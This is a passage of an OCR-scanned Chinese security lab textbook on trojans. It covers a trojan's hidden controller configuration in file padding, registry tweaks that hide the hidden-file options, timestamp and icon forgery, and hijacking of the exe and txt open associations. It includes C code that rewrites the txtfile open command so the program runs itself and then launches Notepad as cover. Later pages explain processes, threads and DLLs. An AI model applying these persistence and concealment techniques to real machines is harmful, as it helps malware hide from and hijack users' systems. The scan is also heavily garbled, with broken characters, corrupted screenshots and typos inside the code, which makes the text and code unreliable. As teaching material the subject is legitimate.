用 WinHex 查看 某 个 木马 服务 器 server. exe 文件 中 的 信息 ,包括 秘密 存储 的 ,加 密 后 
的 控制 端 IP 地 址 和 端口 以 及 通信 和 密码 等 信息 ,如 图 5-8 所 示 ,server. exe 文件 尾部 数据 正常 
情况 下 是 些 无 用 的 填充 数据 “50 41 44 44 49 4E 47…”(PADDING…) 或 全 00, 用 于 文件 对 
齐 ,而 木马 利用 这 些 区 域 存储 秘密 信息 。 图 5-8 中 所 示 的 “41 41 41 41 41 41”(6 个 A, 文 件 
偏 移 地 址 23E90) 是 用 于 定位 的 特征 码 , 也 就 是 说 6 个 A 后 的 数据 就 是 加 密 后 的 控制 端 TP 


地 址 和 端口 以 及 通信 密码 等 信息 (mt-M19…)。 一 般 流程 如 下 。 


文件 中 REV NEO HE NDV IAV HV 选项 @) FOW HMW 


D pimi c aaa MALALA DE| aomp aml 
Server. exe 
EA Offset | 0 1 2 3 4 5 6 7 a 
Cabinete] 00023E50 00 00 00 00 00 00 00 00 w 
00023E60 |00 00 00 00 00 00 00 00 
fleske: pass ts| 00023E70 00 00 00 OO OO 00 OO 00 
š 00023E80 |00 00 00 00 00 00 00 DO 00 00 00 00 00 00 00 OO ... sv 
DefautEditMode | 00023E90 41 41 41 41 41 41 6D 74 2D 4D 6C 39 65 51 6F 63 | AAAAAAmt-Ml9eQoc 
pae original| 00023EA0 53 4C 6C 39 65 4E 6D 4E 43 53 6D 61 61 3D 00 50 | SL19eNmNCSmaa=.P 
unao level: O| 00023EBO 50 41 44 44 49 4E 47 58 58 50 41 44 44 49 4E 47 | PADDINGXXPADDING 
Task a| oooz3Eco |50 41 44 44 49 4E 47 58 58 SO 41 44 44 49 4E 47 | PADDINGXXPADDING 
creation time: 20120905| 00023EDO 50 41 44 44 49 4E 47 58 58 50 41 44 44 49 4E 47 PADDINGXXPADDING 
151028] 00023EE0 50 41 44 44 49 4E 47 58 58 50 41 44 44 49 4E 47 | PADDINGXXPADDING 
Last write time: 201209.05| 00023EFO SD 41 44 44 49 4E 47 58 58 SO 41 44 44 49 4E 47 | PADDINGXXPADDING 
15:16:04] 00023F00 50 41 44 44 49 4E 47 58 58 50 41 44 44 49 4E 47 | PADDINGXXPADDING 
NNN23F1N SN 41 44 44 49 4F 47 SA SA SN 41 44 44 49 4F 47 PADDINGXXPADDING | 
5-8 server. exe 文件 尾部 数据 


(1) 木马 server. exe 启动 。 
(2) 将 server. exe 文件 以 二 进 制 数据 流 的 格式 读 人 内 存 。 


G) 从 文件 尾 开 始 向 前 查找 特征 码 6 个 A, 如 果 找 到 , 则 解密 其 后 的 加 密 字符 串 ,得 到 


控制 端 IP 地址、 端口 和 通信 密码 等 信息 ,否则 直接 退出 。 


(4) 解密 成 功 , 则 主动 发 起 与 控制 端的 网 络 连接 。 

Windows 根 目录 的 位 置 下 存放 着 系统 可 执行 文件 ,如 C; Nwindows. C; NwindowsN 
system32 和 C: NwindowsMVdrivers 等 。Windows 基本 系统 可 执行 文件 有 : 

(1) Services. exe; 系统 服务 的 管理 工具 。 

(2) Lsass. exe; 本 地 的 安全 授权 服务 。 

(3) Explorer. exe: 资源 管理 器 。 

(4) Spoolsv. exe; 将 文件 加 载 到 内 存 中 以 便 以 后 打印 。 

(5) Svchost. exe; 用 来 运行 动态 链接 库 DLL 文件 ,从 而 启动 对 应 的 服务 。Svchost. exe 
进程 可 以 同时 启动 多 个 服务 。 

(6) smss. exe; 会 话 管理 子 系统 ,负责 启动 用 户 会 话 。 

(7) csrss. exe: 子 系统 服务 器 进程 。 

(8) winlogon. exe: 管理 用 户 登 录 。 

(9) internat. exe; 托盘 区 的 拼音 图 标 。 


5. 实践 操作 及 步骤 


1) 修改 文件 夹 选项 
(1) 使 文件 夹 选项 中 “隐藏 受 保护 的 操作 系统 文件 ”选项 不 可 见 。 


[HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft \ Windows\CurrentVersion\ Explorer \ Advanced\ Folder\ 

SuperHidden] 

新 建 键 值 : 字 串 : "Type" 一 "checkbox2"。 

原 键 值 : HB. "Type" 一 "checkbox"。 

(2) 使 文件 夹 选 项 中 “显示 隐藏 文件 和 文件 夹 选项 ”不 可 见 。 

删除 注册 表 键 值 ; 

[HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft \ Windows \ CurrentVersion\ Explorer \ Advanced\ Folder\ 

Hidden\SHOWALL] 

注册 表 键 值 : "CheckedValue"。 

类 型 : DWORD, 值 : "1"。 

2) 修改 文件 时 间 属 性 和 图 标 

(1) 文件 时 间 属 性 修改 。 

启动 文件 属性 修改 器 wjsx. exe, 其 主 界面 如 图 5-2 所 示 ,… 建 立 关联 ?按钮 用 于 在 文件 的 
右键 弹出 菜单 中 添加 “修改 文件 属性 和 时 间 ” 的 关联 项 。 图 5-9 显示 logo. gif 文件 的 时 间 属 
性 修改 为 异常 状态 。 

修改 机 密 文 件 的 时 间 属 性 有 助 于 躲 过 部 分 木马 的 文件 搜索 ,另外 当 再 次 打开 logo. gif 
文件 后 ,Windows 系统 不 会 修改 其 访问 时 间 。 

(2) 修改 文件 图 标 。 

例如 将 某 个 文件 的 图 标 改 为 QQ 图 标 。 首 先 用 Restorator 2007 工具 打开 QQ. exe 文 
件 ,导出 QQ 图 标 为 129. ico, 如 图 5-10 所 示 。 然 后 用 Restorator 2007 工具 打开 待 修改 图 标 
的 文件 ,右键 选择 该 文件 的 图 标 , 导 入 129. ico, 保 存 后 该 文件 的 图 标 即 显示 为 QQ 图 标 。 
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党 规 。 基 全 | 这 和 信息 | 以 前 的 版 本 
文件 (站 AER SEV) SAE IAM WH) 
Fa Togo. cif D @ - ANa 8 [D @ | ass Pl 
文件 类 型 GIF ER Cit) 资源 村 ARTES |x 
打开 方式 。 @ Internet bolor [EROS "ey zm Ah 
a am 
位 置 : C:\Wsers\Adninistrator\Dornloads x O B 重 命名 FD 
大 小 : 8.13 KB (8,326 字 节 ) “e Be DelD) 
占用 空间 : 12.0 (2,268 字 节 ) zu CulsC(O 
ale Cirl+V(R) 
创建 时 间 : 。 2014 年 1 月 11 日 , 22;54:36 添加 光源 (O). Ctrl+U 
修改 时 间 : 2882144514. 6:07:48 REE ID)... Coltl 
访问 时 间 : 。 1624 年 12 月 2 日 ，13:55:02 SHP) » 
SNO- » DAIO. 
属性 : Anza Pew Res 文件 (日 
图 5-9 logo. gif 文件 属性 对 话 框 图 5-10 导出 QQ 图 标 


3) 修改 文件 关联 

(1) 关联 . ex_ 和 exefile。 

打开 注册 表 编 辑 器 ,由 “计算 机 \HKEY_CLASSES_ROOT” 找 到 *. ex_”, 双 击 编 辑 默 认 
项 ,将 数值 类 型 编辑 为 exefile, 如 图 5-11 所 示 。 


:注册 表 编 加 器 
文件 如 REV FEV KREZO WR OD 


5-11 编辑“. ex_” 的 默认 项 


将 .ex_ 和 exefile 关联 , 则 扩展 名 为 “. ex_” 的 文件 被 认为 是 可 执行 文件 。 验 证 方法 : 将 
可 执行 文件 1. exe 改名 为 “1. ex_”, 双 击 1. ex_ 文 件 即 可 运行 。 

上 述 是 直接 编辑 注册 表 项 。cmd 命令 assoc 能 显示 或 修改 文件 扩展 名 关联 ,具体 使 用 
方法 如 下 。 


>assoc .ex = exefile 


回 车 后 . ex_ 和 exefile 关联 起 来 , 则 相应 注册 表 项 随 之 修改 。 


>assoc .ex_= 空格 


回 车 后 . ex_ 和 exefile 分 离 , 则 相应 注册 表 项 随 之 还 原 。 


(2) exefile 和 txtfile 绑 定 。 

展开 注册 表 到 HKEY_CLASSES_ROOT\exefile\shell\open\command, 这 里 是 exe X: 
件 的 打开 方式 ,默认 键 值 为 “%1”% *”。 如 果 把 默认 键 值 改 为 ~“Trojan. exe ⁄41' 5⁄4 * ”, 每 
次 运行 exe 文件 ,这 个 Trojan. exe 文件 就 会 被 执行 。 木 马 灰 蚀 子 就 是 采用 了 关联 exe 文件 
的 打开 方式 。 需 要 注意 的 是 ,修改 注册 表 前 ,请 保存 command 的 项 值 。 

图 5-12 中 把 默认 键 值 改 为 “c:\winhexN\winhex. exe‘ %1”% * ”, 则 当 双 击 任何 一 个 exe 
可 执行 程序 时 ,系统 只 会 启动 winhex. exe, 并 把 exe 文件 名 作为 参数 传 给 winhex, winhex 
显示 exe 文件 的 原始 数据 ,作用 和 命令 “winhex. exe vmware. exe" 一 样 , 如 图 5-13 所 示 。 


2 注册 表 编 辑 器 


文件 四 编辑 下) FEV KAW 帮助 中 
E DefaultIcon 
pA n 
r pm 
E command 
外国 Open vith CFF Explorer 


OBARA MLSA —#*£= | SS O m 


0010 |B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 OD ,.. 

Filesize: 20M800020 |00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00... S] 
2,136,216 bytes |g, SENNEN a| 

Page 1 of 44505 Offset: 0 =77 Block na Size. nja 


set 01234567 89ABCDEF a 
vmware exe 
EMProgram Fies D0000 | 加 SA 90 00 03 00 00 00 04 00 00 00 FF FF 00 OO BZ 


图 5-13 vmware. exe 文件 的 原始 数据 


如 果 不 恢 复 command 的 值 就 关闭 注册 表 编 辑 器 , 则 再 也 无 法 启动 regedit 了 。 虚 拟 实 
践 机 器 (32 位 Windows 7 系统 ) 中 安装 了 一 款 沙 箱 软件 SbieCtrl. exe 和 两 款 杀毒 软件 
(ESET NOD32 和 360 系列 安全 卫士 ) ,正常 情况 下 在 任务 栏 右 侧 的 显示 如 图 5-14(a) 所 示 。 
将 默认 键 值 改 为 “notepad. exe‘ %1”% x*”, 然 后 重新 启动 系统 ,任务 栏 右 侧 的 显示 如 图 5-14(b) 
所 示 。 


图 5-14 任务 栏 


图 5-15 显示 了 开机 启动 软件 皆 无 法 打开 ,由 notepad. exe 启动 后 以 文本 方式 读 入 egui 
. exe、360tray. exe、SbieCtrl. exe、360sd. exe 等 ,导致 这 些 程序 无 法 启动 。 其 他 如 cmd. exe 
和 regedit. exe 等 也 无 法 启动 。 

前 面 的 图 5-14(b) 中 显示 NOD32 软件 无 法 启动 了 ,而 360 杀毒 软件 还 是 能 启动 的 , 双 
击 其 图 标 打开 360 杀毒 软件 界面 扫描 则 可 以 修正 exefile 绑 定 问题 ,如 图 5-16 所 示 。 因 此 在 
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计算 机 中 多 装 几 款 杀 毒 软件 更 能 保证 计算 机 的 安全 。 

(3) txtfile 绑 定 。 

大 名 鼎鼎 的 木马 冰河 采用 的 也 是 与 此 相似 的 一 
H: 关联 txt 文件 。 

将 HKEY_CLASSES_ROOT\txtfile\shell\open\ 
command 的 默认 键 值 由 “C:\Windows\System32\ 
NOTEPAD. EXE %1” 改 为 “C:\TXT 绑 定 . exe %1”， 
打开 任意 一 个 txt 文件 时 , 先 运行 “TXT 绑 定 . exe ” 程 
序 ,再 打开 notepad. exe。 

command 的 默认 键 值 的 修改 由 程序 “TXT 绑 
图 5-15 开机 启动 软件 无 法 打开 定 .exe” 完 成 , 即 运行 “TXT 绑 定 . exe” 一 次 后 , 即 可 实 

H txt 文件 关联 。 相 关 代码 如 下 。 


回 党 用 文件 关联 项 可 执行 文件 无 法 打开 WU 未 处 理 国运 ho 信任 | 


图 5-16 360 杀毒 软件 报警 


# include < windows. h> 
int WINAPI WinMain (HINSTANCE hInstance, HINSTANCE hPrevInstance, 
PSTR szCmdLine, int iCmdShow) 
{ 
bool flag = false; 
char szFilePath[255] = {0}; 
char txtFilePath[255] = {0}; 


HKEY AutoStart; // 键 的 句柄 
if(GetModuleFileName( NULL, szFilePath, MAX_PATH)< 0){ 
// 获 取 当 前 进程 的 文件 完整 路 径 
return FALSE; 
) 
strcat(szFilePath, " %1"); // szFilePath 存储 字符 串 如 "C:\TXT 绑 定 . exe %1" 
RegOpenKeyEx( HKEY_CLASSES_ROOT, // 打 开 一 个 指定 的 注册 表 键 , 


"txtfile\\shell\\open\\command", //AutoStart 得 到 的 打开 键 的 句柄 
0, KEY_ALL ACCESS，&RutoStart) ; 
LPBYTE owner Get = new BYTE[250]; 
DWORD type_1 = REG EXPAND SZ; 
DWORD cbData 1 = 250; 
long ret1 = RegQueryValueEx( AutoStart, NULL, NULL, // 检 索 一 个 已 打开 的 注册 表 句 柄 中 
&type 1，owner_Get，&cbData 1); // 指 定 的 注册 表 键 的 类 型 和 设置 值 
if(ret1!= ERROR_SUCCESS) ( 
return 0; 
} 
if(strcmp( (const char * )owner Get, szFilePath) == 0){ 
// 检 查 键 值 是 否 被 修改 过 
flag = true; // 被 修改 过 


} 
MessageBox (NULL, TEXT (txtfile 已 经 被 关联 !")，TEXT ("TXT 绑 定 ")，MB_OK) ; 
if(!1flag){ 第 一 次 运行 程序 时 修改 键 值 


RegSetValueEx(AutoStart, // 修改 指定 键 值 
rs // 键 名 , 空 字符 串 表 示 ( 默 认 ) 
0, // 保 留 
REG_SZ, // 键 的 类 型 
(LPBYTE) szFilePath, // 设置 值 
strlen(szFilePath) + 1);  // 设 置 值 的 长 度 
RegCloseKey( AutoStart); // 关 闭 释 放 注 册 表 句柄 
}else{ 
strcat(txtFilePath, "Notepad. exe "); // 键 值 已 经 被 修改 过 ,准备 启动 Notepad. exe 
strcat(txtFilePath, szCmdLine) ; //szCmdLine 包含 双击 的 txt 文件 名 
WinExec(txtFilePath, SW_SHOW); // 执 行 "Notepad. exe # # # .txt" 命 令 ， 


// 用 于 掩盖 "TXT 绑 定 . exe" 的 运行 


return 0 ; 


6. 思考 题 
如 图 5-17 所 示 ,双击 哪些 文档 可 能 引发 病毒 感染 ? 


图 5-17 文档 图 标 


进程 与 模块 


1. 实践 目的 
理解 进程 线程 以 及 模块 的 概念 ,掌握 利用 工具 查看 进程 的 方法 。 
2. 实践 环境 


(1) 连 入 Internet 的 计算 机 一 台 , 安 装 Windows XP 或 Windows 7 
等 操作 系统 。 

(2) 实践 工具 ， WinHex, Dependency Walker, ExplorerSuite 安装 
包 ,procexp. exe,XueTr. exe( 不 能 用 于 64 位 系统 ) 。 


3. 名 词 解释 


O) 进程 : 指 一 个 可 执行 文件 在 运行 期 间 请 求 系统 在 内 存 里 开辟 给 
它 的 数据 信息 块 ,系统 通过 控制 这 个 数据 块 为 运行 中 的 程序 提供 数据 交 
换 和 决定 程序 生存 期 限 ,任何 程序 都 必须 拥有 至 少 一 个 进程 ,否则 它 不 
被 系统 承认 。 

(2) 线程 : 在 一 个 进程 里 产生 的 多 个 执行 进度 实例 ,分 别 完成 不 同 
功能 。 

(3) 任务 : 进程 在 桌面 上 显示 出 来 的 窗口 对 象 ,例如 用 户 打开 记事 
本 ,记事 本 会 创建 一 个 在 桌面 上 显示 的 前 台 窗 口 ,这 个 窗口 就 是 任务 管 
理 器 里 看 得 见 的 “任务 "了 ,而 实际 上 真正 在 运行 的 是 进程 notepad. exe, 

(4) 动态 链接 库 : 是 一 个 包含 可 由 多 个 程序 同时 使 用 的 代码 和 数据 
的 库 ,动态 链接 提供 了 一 种 方法 ,使 进程 可 以 调用 不 属于 其 可 执行 代码 
的 函数 。 

O 服务 进程 : 一 种 应 用 程序 类 型 , 它 在 后 台 运 行 。 服 务 应 用 程序 
通常 可 以 在 本 地 和 通过 网 络 为 用 户 提供 一 些 功能 ,例如 客户 端 / 服 务 器 
应 用 程序 、Web 服务 器 数据库 服 务 器 以 及 其 他 基于 服务 器 的 应 用 程序 。 

(6) 句柄 : 是 指使 用 的 一 个 唯一 的 整数 值 , 即 一 个 四 字 节 长 的 数值 ， 
来 标识 应 用 程序 中 的 不 同 对 象 和 同类 对 象 中 的 不 同 实例 ,如 一 个 窗口 、 
按钮 图标、 滚动 条 、 输 出 设备 .控件 或 者 文件 等 。 

(7) 内 核 驱动 : 在 操作 系统 的 内 核 模式 内 运行 的 程序 ,也 称 为 内 核 
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驱动 程序 ,驱动 程序 可 执行 某 些 受 保护 的 操作 ,并 可 访问 用 户 模式 程序 无 法 访问 的 系统 结 
构 , 但 随 着 访问 权 的 增加 ,调试 难度 和 系统 损害 概率 也 随 之 增 大 。 


4. 预备 知识 


1) 进程 和 线程 

可 执行 文件 是 “静态 的 ”“ 死 的 ”, 一 旦 被 操作 系统 加 载 到 内 存 中 运行 ,就 是 “动态 的 ”、 
“ 活 的 ”“ 有 生命 ”的 进程 。 

进程 从 某 一 方面 而 言 就 是 可 执行 文件 把 自身 从 存储 介质 复制 在 内 存 中 的 映像 , 它 通常 
和 某 个 在 磁盘 上 的 文件 保持 着 对 应 关系 。 一 个 完整 的 进程 信息 包括 很 多 方面 的 数据 ,使 用 
进程 查看 工具 (打开 Windows 任务 管理 器 ,如 图 6-1 所 示 ) 看 到 的 “应 用 程序 ”选项 卡 包含 的 
是 进程 的 标题 ,而 “进程 ”选项 卡 包 含 的 是 进程 文件 名 、 进 程 标识 符 、 占 用 内 存 等 。 

Windows 任务 管理 器 l- D) 

XD 选项 (0) HEV 关机 (四 帮助 (ED) 文件 (E) 选项 (0) SEV $ MDW 


应 用 程序 ] 进程 “| 性 能 [联网 [AP 应 用 程序 | 进程 EE ka [用户 
CPU 使 用 cru 合用 记录 


映像 名 称 
TWETIWPO EYE 
LSASS EXE 


NVSYC32. EXE 
ROYERPNT EXE 
Q es 


SQLSERVR EXE 
9LWriter exe 
SVCHOST. EXE 


SVCIDST EXE 
SVCHOST. EXE 
SVCHOST_ EXE 
SVCIDST EXE 
SVCIDST EXE 


38888888888888 8ğ88888 


` 
> 


2566100918 G) 结束 进程 E) 


进程 归 : 46 — CPU 使 用 : 2% 内 存 使 用 : 1054M / 4957M 84996: 56 — CPU 使 用 : 0% 内 存 使 用 : 1814M / 4956 


图 6-1 Windows 任务 管理 器 


(1) 进程 标识 符 : 是 系统 分 配给 进程 内 存 空 间 时 指定 的 唯一 数字 ,进程 从 载 人 内 存 到 
结束 运行 的 期 间 里 这 个 数字 都 是 保持 不 变 的 。 

(2) 进程 文件 名 : 是 对 应 着 的 介质 存储 文件 名 称 , 根 据 “ 进 程 文件 名 ”就 可 以 找到 最 初 
的 可 执行 文件 位 置 。 

运行 中 的 进程 可 能 具有 以 下 三 种 基本 状态 。 

(1) RAIRA (Ready): 进程 已 获得 除 处 理 器 外 的 所 需 资源 ,等 待 分 配 处 理 器 资源 ,只 
要 分 配 了 处 理 器 进程 就 可 执行 。 就 绪 进 程 可 以 按 多 个 优先 级 来 划分 队列 。 例 如 , 当 一 个 进 
程 由 于 时 间 片 用 完 而 进入 就 绪 状 态 时 , 排 人 低 优 先 级 队列 ; 当 进程 由 I/O 操作 完成 而 进入 
就 绪 状 态 时 , 排 入 高 优先 级 队列 。 

(2) ZIRE Running): 进程 占用 处 理 器 资源 ,处 于 此 状态 的 进程 的 数目 小 于 等 于 处 
理 器 的 数目 。 在 没有 其 他 进程 可 以 执行 时 (如 所 有 进程 都 在 阻塞 状态 ) .通常 会 自动 执行 系 
统 的 空闲 进程 。 
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G) 阻塞 状态 (Blocked) : 由 于 进程 等 待 某 种 条 件 ( 如 1/0 操作 或 进程 同步 ) ,在 条 件 满 
足 之 前 无 法 继续 执行 。 该 事件 发 生前 即使 把 处 理 机 分 配给 该 进程 ,也 无 法 运行 。 

线程 (Thread) 则 是 在 一 个 进程 里 产生 的 多 个 执行 进度 实例 。 举 个 简单 的 例子 ,一 个 网 
络 文件 传输 程序 如 果 只 有 一 个 线程 (单线 程 ) 运 作 ,那么 它 的 执行 效率 会 非常 低下 ,因为 它 既 
需要 从 网 络 上 读 取 文件 数据 ,又 需要 把 文件 保存 到 磁盘 ,同时 还 需要 绘制 当前 传输 进度 条 ， 
由 于 在 代码 的 角度 里 这 些 操 作 只 能 一 条 条 地 顺序 执行 ,因此 程序 就 不 能 很 好 地 做 到 在 保存 
数据 的 同时 绘制 传输 进度 条 。 

多 线程 技术 则 是 为 了 解决 这 种 问题 而 产生 的 。 采 用 多 线程 技术 编写 的 应 用 程序 在 运行 
时 可 以 产生 多 个 同时 执行 的 操作 实例 。 例 如 一 个 采用 多 线程 技术 的 网 络 文 件 传输 程序 就 能 
同时 分 出 3 个 进度 来 同时 执行 网 络 数据 传输 ,文件 保存 操作 和 绘制 传输 进度 条 的 操作 ,使 得 
这 个 程序 运行 非常 流畅 。 
mnn 多 线程 中 的 每 个 线程 就 像 火 车 的 每 一 节 车 厢 , 而 进程 则 是 火 
进程 地 址 空间 车 。 车 厢 离 开火 车 是 无 法 跑 动 的 , 同 理 火车 也 不 可 能 只 有 一 节 车 


ED 厢 。 多 线程 的 出 现 就 是 为 了 提高 效率 。 
区 > 


在 程序 运行 时 ,只 能 产生 一 个 进程 ,但 是 在 这 个 进程 的 内 存 空 
间 ( 系 统 为 程序 能 正常 执行 而 开辟 的 独立 内 存 领 域 ) 里 ,可 以 产生 多 
rra 个 线程 ,如 图 6-2 所 示 , 其 中 至 少 有 一 个 默认 的 线程 ,被 称 为 “主线 
程 ”, 它 是 程序 启动 的 入 口 (如 main() 函 数 ) 主 要 代码 的 运行 部 分 。 

多 个 线程 共享 资源 是 其 重要 特性 ,也 是 要 值得 注意 的 重要 问 


A J] 题 , 举 个 例子 来 说 ,两 个 线程 不 能 将 信息 同时 发 送 给 一 台 打 印 机 。 
L me] 需要 利用 同步 机 制 来 解决 这 个 问题 。 
A aera Q) Event 事件 : 一 个 事件 有 两 种 状态 , 即 激发 状态 和 未 激发 状 


态 ,也 称 有 信号 状态 和 无 信号 状态 。 函 数 CreateEvent() 创建 或 打 
开 一 个 命名 的 或 无 名 的 事件 对 象 ,共有 3 个 函数 来 改变 事件 的 状态 , 即 SetEvent()、 
ResetEvent() 和 PulseEvent() 。 

(2) Critical Section 临界 区 : 使 用 临界 区 域 的 一 个 忠告 就 是 不 要 长 时 间 锁 住 一 份 资源 ， 
即 进入 临界 区 后 必须 尽快 地 离开 ,释放 资源 。 函 数 InitializeCriticalSection() 创 建 一 个 临界 
区 ,函数 EnterCriticalSection() 进 入 临界 区 ,函数 LeaveCriticalSection() 离 开 临 界 区 。 

(3) Mutex HJE fr: 互 斥 器 的 功能 和 临界 区 域 很 相似 。 区 别 是 Mutex 所 花费 的 时 间 比 
Critical Section 多 得 多 ,创建 互 斥 体 CreateMutex() ,打开 互 斥 体 OpenMutex() , Ë jk H. FE 
体 ReleaseMutex() 。 

(4) Semaphore 信号 量 : 信号 量 是 解决 producer/consumer 问题 的 关键 要 素 。 函 数 
CreateSemaphore() 用 来 产生 信号 量 。ReleaseSemaphore() 用 来 解除 锁定 。Semaphore 的 
现 值 代表 的 意义 是 可 用 的 资源 数 。 如 果 Semaphore 的 现 值 为 1 ,表示 还 有 一 个 锁定 动作 可 
以 成 功 ; 如 果 现 值 为 5, 就 表示 还 有 5 个 锁定 动作 可 以 成 功 。 

Windows 下 创建 线程 的 函数 有 CreateThread、AfxBeginThread 和 _begingthread, 这 三 
种 函数 既 有 区 别 也 有 关联 , 对 线程 的 控制 函数 有 ResumeThread (恢复 运行 ) 和 
SuspendThread( 挂 起 暂停 )。 用 工具 procexp 查看 360 杀毒 进程 360sd. exe 的 线程 信息 ,如 
图 6-3 所 示 。 


图 6-3(a) 显 示 360sd. exe 在 未 启动 病毒 扫描 前 的 线程 数量 是 16 ,启动 病毒 扫描 后 的 线 
程 快速 增加 到 30 个 以 上 ,如 图 6-3(b) 所 示 。 线 程 的 增加 有 助 于 加 快 查 毒 的 进度 , 当 扫 描 结 
束 后 线程 数量 逐渐 回归 正常 水 平 。 


Performance | Performance Graph | Diskand Perfomance | Performance Gaph | Disk and Network. 
TnP | Secwity | Envir Tess | TOP | seu | Envronment | Stinos 


C v Csmteh | Start Address 


3 20 Cz7e810729 
20 0z7c810729 
5 0z7e810729 
ntkrnlpa. ezetozafafo 
0z7e810729 
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0z7e810729 
üz7e810729 
0z7e810729 
0z7e810729 
0z7e810729 
0z7et10729 
0z7e810729 
Oztest0r29 | s00 tkrnlpa ezet0zd2960. 


1080 ' god ][ was ] 
19:09:12 2014-4-3 22:04:40 2014-4-3 
Wat:WrUserRequest Base Priority: 8 Wak:WrUserRequest Base Priority: 8 
0:00:00.171 Dynamic Priority: 10 3 00:00:00.671 Dynamic Priority: 11 
0:00:00.125 i 00000406 

Contoxt Switches: 567,152 


T) [EC CO 


图 6-3 360sd. exe 的 线程 信息 


2) 动态 链接 库 

动态 链接 库 (Dynamic Link Library, DLL) 是 微软 公司 在 微软 视窗 操作 系统 ( 即 
Windows 操作 系统 ) 中 实现 共享 函数 库 概 念 的 一 种 方式 。 动 态 链 接 库 的 其 他 形式 包括 
ActiveX 控件 (. ocx) ,如 网 银 密码 控件 等 ; 控制 面板 (. cpl) 文 件 ( 位 于 控制 面板 中 的 项 ,每 个 
项 都 是 一 个 专用 DLL) 。 

动态 链接 库 文件 是 一 种 不 可 执行 的 二 进 制程 序 文件 , 它 允 许 程序 共享 执行 特殊 任务 所 
必需 的 代码 和 其 他 资源 ,也 称 为 程序 模块 。Windows 提供 的 DLL 文件 中 包含 了 允许 基于 
Windows 的 程序 在 Windows 环境 下 操作 的 许多 函数 和 资源 。 一 般 被 存放 在 C:\Windows\ 
System32 目录 下 ,其 中 3 个 最 重要 的 动态 链接 库 是 kernel32. dll, .user32. dll 和 gdi32. dll 
(32 位 系统 ) 。 

(1) kernel32. dll 是 非常 重要 的 32 位 动态 链接 库 文件 .属于 内 核 级 文件 。 它 控制 着 系 
统 的 内 存 管理 .数据 的 输入 输出 操作 和 中 断 处 理 。 当 Windows 启动 时 ,kernel32. dll 就 驻 留 
在 内 存 中 特定 的 写 保护 区 域 ,使 别 的 程序 无 法 占用 这 个 内 存 区 域 。 

(2) user32. dll 是 Windows 用 户 界 面相 关 应 用 程序 接口 ,如 创建 窗口 和 发 送 消息 。 

(3) gdi32. dll 是 Windows GDI 图 形 用 户 界面 相关 程序 ,包含 的 函数 用 来 绘制 图 像 
和 显示 文字 DLL 文件 格式 和 EXE 文件 一 样 , 也 是 PE 格式 。Dependency 工具 (文件 夹 
depends22_x86) 可 以 递归 扫描 以 寻找 程序 所 使 用 的 所 有 依赖 DLL, Es] 6-4 所 示 为 user32. dll 所 
有 依赖 DLL。 
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479 (DxO1DF) 
480 (0x01E0) 


478 (0x01DE) 
479 (DxO1DF) 


NessageBoxIndirectA 0x0002 图 | 


一 


Dependency Walker - [user32.d11] SE] 
B File Edit View Options Profile Window Help -|8| x 
CAE E ESE 
3 0 vsz [Function Entry Poi 

由 - El e2. L 
S El KERMEL32 DLL 
Ë) wrm DLL 
83] mL mL 
D mu DLL 
由 -8 加 ADVAPI32 DLL 
m SU] wsTcsz DLL < 国 | >. 
由 -8 加 PowRPROF DLL E |Ording ` Function 
mO WINSTA. DLL E |473 mx0109) |472 (0x01D8) | MenultemFronPoint 
474 (Ox01DA) | 473 (Dx01D9) |WenufindowProcÀ 
e lifi 475 (0x010) (DxO1DA) | fenufindowProcY #11 SZ A 
依赖 其 他 DLL = 476 (DxO1DC) (0x01DB) 输出 函数 
的 输出 函数 o 477 mx01ID) 476 (Ox01DC) 
Em |478 (0x01DE) | 477 
|| 
[=] 
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图 6-4 user32. dll 所 有 依赖 DLL 


图 6-4 中 左边 栏目 显示 user32. dll 自身 需要 依赖 其 他 DLL 的 输出 函数 ,右边 栏目 是 
user32. dll 的 输出 函数 ( 库 函 数 ) 列 表 , 是 可 以 供给 程序 或 其 他 DLL 调用 的 功能 函数 ,如 序 
号 为 477 的 输出 函数 为 MessageBoxA 是 显示 一 个 模 态 对 话 框 (消息 框 \ 通 知 框 )。DLL 可 
以 被 动态 加 载 , 即 当 调 用 其 库 函 数 时 加 载 进 内 存 ,函数 调用 完 则 可 以 印 载 ,以 节省 内 存 空 间 。 

3) EXE 与 DLL 的 关系 

在 Windows 中 ,应 用 程序 并 不 是 一 个 完整 的 可 执行 文件 ,它们 被 分 割 成 一 些 相 对 独立 
的 动态 链接 库 , 即 DLL 文件 ,放置 于 系统 中 。 执 行 某 一 个 程序 时 ,相应 的 DLL 文件 就 会 被 
调用 。 一 个 应 用 程序 可 有 多 个 DLL 文件 ,一 个 DLL 文件 也 可 能 被 几 个 应 用 程序 所 共用 ,这 
样 的 DLL 文件 被 称 为 共享 DLL 文件 。 用 Dependency 工具 查看 优酷 的 客户 端 软件 
YoukuDesktop. exe 调用 了 哪些 DLL, 如 图 6-5 所 示 。 


Dependency Walker — [YoukuDesktop. exe] 


m File Edit View Options Profile Window Help 


CICNSICVYEP TS ET Tee skY—lu]iioi 


日 - C YOWKUDESKTOP EXE 加 Ordinal © | Hint Function a 
国 vseR2. DL ` N/A 87 (0x0057) | HttpOpenRequestW TI 
E VERSION. DLL N/A 88 (Dx0058) | HttpQueryInfoA 
m O ADVAPI32. DLL N/A 89 (0x0059) | HttpQueryInfoW 目 
m 回 SHELL. .DLL N/A 93 (0x005D) | HttpSendRequestW 
[= 国 Ws2_32. DLL WA 106 (0x006A) |InternetCloselandle 加 

5 ADVAPI32 DLL E| My 113 rarele InternetConnectW 
i N/A 153 (Dx0099) | InternetOpent 
+ ü erai WA 158 (Dx009E) | InternetReadFile a 
Ë] WIDLL DLL J s | E 
B- O vs2MELP. DLL Ordinal ° | Hint Function a 
35] VsER32. DLL J 101 (0x0065) | N/A NA = 
由 - E KERMEL32 DLL 102 (Dx0066) | N/A N/A 
日 m 103 (Dz0067) | N/A N/A 
8] MSVCRT. DLL 104 (Dxz0068) | N/A N/A 
国 NTDLL DLL 105 (0x0069) | N/A N/A 
国 shrwapr DIL 106 (0x006A) | 17 (0x0011) | DispatchAPICall 
B) ADVAPI32 DLL EL |107 (zx0068) | O (0000) CosmitUr1CacheEntryÀ a 
B) E erz DLL — Z |x; È l E] 


图 6-5 YoukuDesktop. exe 文 件 的 DLL 列表 


可 执行 文件 (executable file) 是 由 多 个 DLL 模块 组 成 的 。 图 6-5 显示 了 
